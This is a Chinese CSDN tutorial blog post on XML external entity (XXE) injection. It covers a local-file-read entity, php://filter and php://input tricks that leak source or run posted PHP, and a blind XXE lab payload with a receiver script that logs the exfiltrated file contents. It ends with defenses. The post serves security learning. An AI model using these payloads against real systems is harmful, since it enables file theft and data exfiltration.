XML注入学习

最新推荐文章于 2024-08-16 17:40:16 发布
最新推荐文章于 2024-08-16 17:40:16 发布
阅读量6.9k 收藏 8
点赞数 2
文章标签: xml php 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xujunhui222/article/details/122846459
版权

一、什么是XML注入

XML 指可扩展标记语言(EXtensible Markup Language)
XML 是一种标记语言,很类似 HTML
XML 的设计宗旨是传输数据,而非显示数据
XML 标签没有被预定义。您需要自行定义标签。
XML 被设计为具有自我描述性。
XML 是 W3C 的推荐标准
简单来说xml就是用来存储数据的。

二、XML的特点

XML仅仅是纯文本,他不会做任何事情。
XML可以自己发明标签(允许定义自己的标签和文档结构)

三、XML的定义

首先是XML声明,然后是DTD部分 <!DOCTYPE 变量名,<元素>>

如下图

<?xml version="1.0"?>
<!DOCTYPE  ANY [
<!ENTITY entityex SYSTEM "file:///"etc/password">
]>
<abc>&entityex;</abc>

什么是XML注入

XML注入又叫XXE攻击,全称为XML External Entity,从安全的角度来理解,可以叫做XML外部实体攻击。在XML实体中,关键字‘’system‘’可以让XML解析器从URL中读取内容,并允许他在XML文档中被替换,因此,攻击者可以通过实体将他自定义的值发送给应用程序,然后让应用程序去呈现, 就是攻击者强制XML解析器去访问攻击者指定的资源内容(可以是系统上本地文件也可以是远程系统上的文件)

XEE扩展

<!ENTITY 实体名称 SYSTEM “URI/URL”>

外部引用可支持http,file等协议,不同的语言支持的协议不同,但是存在一些通用的协议,具体内容如下在这里插入图片描述使用的条件:
flie://协议在双off的情况下也是可以正常使用的
allow_url_fopen: off/on
allow-url_fopen: off/on
flie:// 用于访问本地文件系统,在CTF中常用来读取本地文件
使用方法:file://文件的绝对路径和文件名

php://协议不需要开启allow_url_fopen
php://input、php://stdin、php://memory和php://temp需要开启allow_url_include

php://filter 用于读取源码且在双off的情况下也能正常使用
Eg:http://127.0.0.1/cmd.php?flie=php://filter/read=convert.base64-encode/resource=index.php

php://input 可以访问请求的原始数据的只读流,将POST请求中的数据作为PHP代码执行
allow_url_fopen:off/on
allow_url_include:on
Eg: http://127.0.0.1/cmd.php?flie=php://input
[POST DATA]<?php phpinfo()?>

XXE漏洞原理

大体有四种方式:
1.simplexml_load_string()函数造成的回显注入
2.SimpleXMLElement()对象造成的回显注入
3.DOMDocument()类造成的回显注入
4.BlindXXE形式==>>也是由simplexml_load_string()函数造成的无回显注入

靶场实现

无回显注入 需要引用外部实体,下面是我搭建的靶场,在一个php文件下发现有simplexml_load_string函数
HTTP_RAW_POST_DATA是我们要传的参数,simplexml_load_string函数将形式良好的XML字符串转换为SimpleXMLElement对象,如下图所示
在这里插入图片描述向POST请求传参playload

$test =<<<EOF
<?xml version="1.0"?>
<!DOCTYPE ANY[
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=D:\phpstudy_pro\WWW\925\a.txt">
<!ENTITY % remote SYSTEM "http://127.0.0.1/925/1.xml"> 
%remote;
%send; 
]>

引用1.xml,1.xml会将读取的文件发给2.php,2.php会把读取的内容保存在3.txt.这样就成功读取了我们想要读取的文件。在这里插入图片描述2.php
<?php file_put_contents("3.txt",$_GET["id"],FILE_APPEND);?>

漏洞防御方法

需要条件

1.程序允许引入外部实体
2.用户可以控制输入

方案一、使用开发语言提供的禁用外部实体的方法
PHP: libxml_ disable_ entity_ loader(true);
其他语言:
documentBuilderFactory.setExpandEntityReferences(false);
documentBuilderFactory.setFeature(XMLConstants.)FEATURE_SECURE_PROCESSING,true);
方案二、过滤用户提交的XML数据 关键词:,SYSTEM和PUBLIC.

风无处不在
关注
【漏洞挖掘】——21、RPO漏洞挖掘攻防
Fly_鹏程万里
03-03 3143
Gareth Heyes在2014年首次提出了一种新型攻击手法—RPO(Relative Path Overwrite)相对路径覆盖,该漏洞是一种利用相对URL路径覆盖目标文件的一种攻击手段,其主要依赖于服务器和浏览器的解析差异性并利用前端代码中加载的css/js的相对路径来加载其他文件,最终使得浏览器将服务器返回的不是css/js的文件当做css/js来解析,从而导致XSS,信息泄露等漏洞产生。
手把手教你使用 Spring IOC 容器完成注入操作(xml注入 + 注解注入)(1)
2401_83916355的博客
04-21 812
外链图片转存中…(img-RTXY9qIs-1713694441462)][外链图片转存中…(img-9M5Q66LO-1713694441462)][外链图片转存中…(img-Okq4Ch5y-1713694441463)]
XML 注入
发哥微课堂
06-15 8030
0x00:简介 首先先简单的说一下 xml,看一下它的全名称,叫 Xtensible Markup Language,即可扩展的标记语言,可直接理解为内容可自定义扩展,标签可自定义扩展。其实就是一个文本格式的文件,以 xml 结尾,里面的标签内容可以自定义。它具有很清晰的层次结构,便于阅读,经常被用来做配置文件和存储数据。web 中用 xml 格式来传输数据和处理的功能也有很多。而后端没有对 x...
深入浅出带你了解XML实体注入
qq_44005305的博客
01-02 1063
Xml外部实体注入漏洞(XML External Entity Injection)简称XXE,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可以构造加载恶意外部文件,进而通过恶意外部文件对服务器进行攻击。今天比较详细的讲了XXE漏洞的原理以及应用方法,有兴趣的小伙伴可以自己去搭建靶机来进行测试,喜欢的小伙伴不妨一键三连。## 题外话初入计算机行业的人或者大学计算机相关专业毕业生,很多因缺少实战经验,就业处处碰壁。
XML外部实体注入
最新发布
2201_75572825的博客
08-16 1516
比如下面这个插入了“<”符号,解析器会把它当作新元素的开始,就会产生错误,为了避免这个错误,我们可以用实体引用来替代这些特殊的字符。其中,entity-name是参数实体的名称,entity-value 是参数实体的值。在这个例子中,定义了一个名为author的内部实体,它的实际内容是John Smith,在xml文档中,通过&author进行引用,并将其替换为实际内容。而在DTD中,实体是一种可以被引用的数据类型,它可以用来代替特定的字符,字符串,符号等,从而使DTD更加灵活和易于维护。
Injection Attacks-XML注入
weixin_34092455的博客
03-11 276
注入攻击 XML注入 虽然JSON的出现实现了服务器与客户端之间的“轻量级”数据交流,但是,作为另一种流行的可行方案,许多web服务API同时还是继续支持XML。另外,除了web服务之外,XML也是许多使用XML schemas 实行数据交换的协议的基础,例如RSS,Atom,SOAP,以及RDF等等,举不胜举。 XML无处不在:它存在于...
XML注入
秋水的博客
09-08 3938
XML注入简介 什么是xmlXML 指可扩展标记语言(EXtensible Markup Language) XML 是一种标记语言,很类似 HTML XML 的设计宗旨是传输数据,而非显示数据 XML 标签没有被预定义。您需要自行定义标签。 XML 被设计为具有自我描述性。 XML 是 W3C 的推荐标准 例如:在tomcat中配置文件的存储格式便是XML文件,server...
基于XML注入
欢迎阅读我的博客
03-18 428
准备一个UserDao类和UserService类 , 其中 UserService类中有UserDao类型的属性 注入外部Bean(常用) 注入外部Bean的方式:在外部注册一个bean, 然后通过外部bean的id配合property标签的ref引用属性进行注入 注入内部Bean(了解) 注入内部Bean的方式:在bean标签中嵌套bean标签 , 内部bean的id是没有用的 , 不能通过容器被获取到所以不用写id set 注入的核心实现原理 set注入是基于set方法实现的,底层会通过反射机制调用属
xml实体注入
HoAd'blog
02-01 444
xml实体注入 XXE漏洞即xml外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害。xxe漏洞触发的点往往是可以上传xml文件的位置,没有对上传的xml文件进行过滤,导致可上传恶意xml文件。 - XML被设计为传输和存储数据,其焦点是数据的内容。 - HTML被设计用来显示数据,其焦点是数据的外观。 &lt &gt &amp &apos &
xml学习
08-10
XML(eXtensible Markup Language)是一种用于标记数据的语言,广泛应用于数据交换、...实践中,结合实际项目进行练习,如编写XML文件、解析XML、处理XML注入和XXE安全问题等,将有助于巩固理论知识并提升技能水平。
java注解注入实体类_最详细的 Spring IOC 注入xml 注入 + 注解注入
weixin_32778881的博客
03-02 2329
@[toc](Spring IOC 容器的基本使用)一、为什么要使用 Spring?1.1 传统的 MVC 架构的程序1.2 程序耦合性过高?1.3 如何解耦?1.4 Spring IOC 的依赖注入二、Spring IOC 的依赖注入2.1 使用构造函数完成依赖注入2.1.1 标签的使用讲解2.1.2 构造函数依赖注入的优缺点2.1.3 使用构造函数完成依赖注入的实例2.2 使用 setter ...
XML-Based Injection in Spring 基于XML配置的依赖注入
u011225581的专栏
03-19 434
原文链接:XML-Based Injection in Spring 1. Introduction 概述 In this basic tutorial, we’ll learn how to do simple XML-based bean configuration with the Spring Framework. 这里,一起学习如何在Spring框架中使用XML文件进行bean对象配置吧 2. Overview 回顾一下 Let's start by adding Spring'..
通过Pentester_Lab学习XML注入
Mi1k7ea
05-14 1552
Pentester Lab是一款老外编写的Web渗透练习环境。   XML注入相关概念: XML是一种可扩展标记语言,可以理解为HTML的扩展语言,一般用于数据存储、数据传输、数据共享,其中DTD文档来解释XML文档。XML必须包含根元素,所有的标签都要闭合,对大小写敏感,并且属性值需要加引号。 XML注入即XXE(XML外部实体注入),是指利用可控的参数或入口来加载不可控的参数或代码,造...
XML内容注入
weixin_42299862的博客
03-07 1459
一、介绍 XML注入主要分为内容注入和实体注入。 内容注入分为XML数据注入、样式表注入、XPATH/XQuery注入。 二、前提条件:有入口用户可修改XML 三、初步测试步骤 (1)检查系统设计文档/代码飞检/访谈,检查服务器文件,收集出所有的XML存储文件 (2)检查所有XML存储文件的外部输入位置(如web页面输入或修改参数值的位置),通过burpsuit绕过客户端校验,使提交的参数值包含&...
xml注入
Y-Y-K的博客
04-15 1065
xml注入实体引用DTD(文档类型定义)定义:构建方式:参数实体 实体引用 DTD(文档类型定义) 定义: 其可定义XML文档的合法构建模块,可在XML文档内声明,也可外部引用。 构建方式: 1.内部实体声明 <!ENTITY entity-name "entity-value"> 引用:&entity-name;,即可将"entity-value"展示出来 2.外部声明默认...
浅谈“XML注入
→_→
05-09 3759
漏洞名称: XML注入 描述: 可扩展标记语言 (Extensible Markup Language, XML) ,用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。 XML是标准通用标记语言 (SGML) 的子集,非常适合 Web 传输。XML 提供统一的方法来描述和交换独立于应用程序或供应商的结构化数据。发现目前一些普遍使用xml的场景中都存在一种古老的XML实体注入漏洞,这可能导致较为严重的安全问题,使得攻击者可能可
34-XXE(XML外部实体注入
XLbb的博客
05-19 977
XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。3、文档结构XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。4、基本的PAYLOAD结构:5、使用DTD实体的攻击方式 :DTD 引用方式(简要了解):1. DTD 内部声明DOCTYPE 根元素 [元素声明]>2. DTD 外部引用。
在web.xml中使用资源注射(@Resource)
jubincn的专栏
02-08 309
资源注射是从JavaEE 5.0开始出现,实现了Tomcat在启动时自动将web.xml中的配置信息“注射”到Servlet中。资源注射是通过Annotation完成,Annotation是一种特殊的接口,以"@"为标志,用法如下: @Resource (name="messageNameInWebXml") private String message; 有时为了简洁,上面的两行代码可以...
java bean如何使用xml注入
05-26
Java Bean 可以使用 XML 配置文件进行属性注入,具体步骤如下: 1. 创建一个 Java Bean 类,并在类中定义需要进行注入的属性和对应的 setter 方法。 2. 在 XML 配置文件中定义一个 Bean 标签,并指定该标签的 id 属性和 class 属性,id 属性表示该 Bean 的名称,class 属性表示该 Bean 对应的 Java 类的全限定名。 3. 在 Bean 标签内部,使用 Property 标签来设置需要注入的属性,其中 name 属性表示属性名称,value 属性或者 ref 属性表示属性值。如果使用 value 属性,则直接设置属性值;如果使用 ref 属性,则表示该属性值是另外一个 Bean 的实例。 例如,下面是一个使用 XML 注入的例子: ```xml <bean id="student" class="com.example.Student"> <property name="name" value="Tom"/> <property name="age" value="18"/> <property name="address" ref="address"/> </bean> <bean id="address" class="com.example.Address"> <property name="city" value="Beijing"/> <property name="street" value="Chaoyang Street"/> </bean> ``` 在上面的例子中,定义了两个 Bean,一个是 Student,另一个是 Address。在 Student 中需要注入的属性有 name、age 和 address。其中,name 和 age 的值是直接设置的,而 address 的值是通过 ref 引用另一个 Bean,即 Address。 使用 XML 注入可以使代码更加清晰、易于维护。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值